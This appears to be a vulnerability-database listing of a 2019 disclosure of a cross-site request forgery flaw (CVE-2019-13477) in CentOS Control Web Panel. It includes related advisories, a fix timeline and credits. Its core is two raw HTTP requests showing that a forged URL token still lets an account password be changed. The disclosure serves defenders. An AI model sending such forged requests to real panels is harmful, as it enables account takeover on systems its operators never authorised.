CentOS 7.6.1810 Control Web Panel 0.9.8.837 Cross Site Request Forgery Vulnerability

🗓️ 26 Aug 2019 00:00:00Reported by Pongtorn AngsuchotmeteeType

zdt🔗 0day.today👁 26 Views

CentOS 7.6.1810 CWP 0.9.8.837 CSRF Vulnerabilit

Reporter	Title	Published	Views	Family All 11
BDU FSTEC	The vulnerability of the “Forgot Password” function in the server management application CentOS Web Panel allows a hacker to perform arbitrary actions on a vulnerable device.	13 Jan 202000:00	–	bdu_fstec
CNVD	CentOS Web Panel Cross-Site Request Forgery Vulnerability (CNVD-2019-40074)	22 Aug 201900:00	–	cnvd
CVE	CVE-2019-13477	21 Aug 201918:55	–	cve
Cvelist	CVE-2019-13477	21 Aug 201918:55	–	cvelist
EUVD	EUVD-2019-4945	7 Oct 202500:30	–	euvd
NVD	CVE-2019-13477	21 Aug 201919:15	–	nvd
OSV	CVE-2019-13477	21 Aug 201919:15	–	osv
Packet Storm	CentOS 7.6.1810 Control Web Panel 0.9.8.837 Cross Site Request Forgery	26 Aug 201900:00	–	packetstorm
Prion	Cross site request forgery (csrf)	21 Aug 201919:15	–	prion
Positive Technologies	PT-2019-4343 · Centos · Centos Web Panel	20 Aug 201900:00	–	ptsecurity

# ====================================================================
# Information
# ====================================================================

Product     : CWP Control Web Panel
version     : 0.9.8.837
Fixed on    : 0.9.8.851
Test on     : CentOS 7.6.1810 (Core)
Reference   : https://control-webpanel.com/
CVE-Number  : 2019-13477


Original request

POST /cwp_4a1498ae31fc95e1b03f1a62d336b154/admin/loader_ajax.php?ajax=list_accounts HTTP/1.1
Host: 192.168.75.148:2087
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.75.148:2087/cwp_4a1498ae31fc95e1b03f1a62d336b154/admin/index.php?module=list_accounts
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 50
Connection: close
Cookie: cwpsrv-bad194011f5ad0cf609c77ad222e50d6=53tt3djbnhepcprdbtoc7uc4d2; _firstImpression=true

accion=changePass&pass=UEBzc3cwcmQ=&username=user1




Even the url has token value,but the token only check for pattern "cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
modify the end of the token value  

POST /cwp_99999999999999999999999999999999/admin/loader_ajax.php?ajax=list_accounts HTTP/1.1
Host: 192.168.75.148:2087
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.75.148:2087/cwp_4a1498ae31fc95e1b03f1a62d336b154/admin/index.php?module=list_accounts
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 50
Connection: close
Cookie: cwpsrv-bad194011f5ad0cf609c77ad222e50d6=53tt3djbnhepcprdbtoc7uc4d2; _firstImpression=true

accion=changePass&pass=UEBzc3cwcmQ=&username=user1



# ====================================================================
# PoC
# ====================================================================
https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13477.md


# ====================================================================
# Timeline
# ====================================================================
2019-06-05: Discovered the bug
2019-06-05: Reported to vendor
2019-06-05: Vender accepted the vulnerability
2019-07-17: The vulnerability has been fixed
2019-08-20: published


# ====================================================================
# Discovered by
# ====================================================================
Pongtorn Angsuchotmetee
Nissana Sirijirakal
Narin Boonwasanarak

#  0day.today [2019-12-04]  #

26 Aug 2019 00:00Current

0.1Low risk

Vulners AI Score0.1

EPSS0.00112